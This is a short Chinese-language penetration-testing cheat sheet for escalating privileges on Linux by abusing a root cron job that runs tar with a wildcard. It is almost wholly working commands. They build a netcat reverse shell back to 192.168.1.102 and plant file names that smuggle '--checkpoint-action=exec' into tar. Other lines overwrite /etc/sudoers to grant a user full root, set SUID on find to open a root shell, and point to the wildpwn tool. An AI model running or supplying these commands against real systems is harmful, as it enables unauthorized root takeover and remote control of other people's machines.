通配符提权
低权限登录
查看cron
>cat /etc/crontab
存在一个定时压缩目录的任务
生成反向shell
>msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R
再监听
>nc -lvp 8888
靶机执行
>echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
>echo "" > "--checkpoint-action=exec=sh shell.sh"
>echo "" > --checkpoint=1
>tar cf archive.tar *
即可返回shell
或使用sudoer
>echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
>echo "" > "--checkpoint-action=exec=sh demo.sh"
>echo "" > --checkpoint=1
>tar cf archive.tar *
或suid
>echo "chmod u+s /usr/bin/find" > test.sh
>echo "" > "--checkpoint-action=exec=sh test.sh"
>echo "" > --checkpoint=1
>tar cf archive.tar *
>ls -al /usr/bin/find
>find f1 -exec "whoami" \;
>root
>find f1 -exec "/bin/sh" \;
>id
>whoami
工具
https://github.com/localh0t/wildpwn